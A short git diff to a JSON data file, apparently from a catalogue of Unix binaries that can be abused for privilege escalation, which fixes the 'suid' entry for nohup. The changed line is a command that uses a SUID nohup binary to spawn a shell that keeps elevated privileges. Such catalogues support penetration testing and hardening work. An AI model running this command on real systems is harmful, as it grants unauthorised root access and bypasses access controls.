diff --git a/data/nohup.json b/data/nohup.json index b3ff5de..6062196 100644 --- a/data/nohup.json +++ b/data/nohup.json @@ -17,8 +17,8 @@ ], "suid": [ { - "code": "sudo nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\"" + "code": "./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\"" } ] } -} \ No newline at end of file +}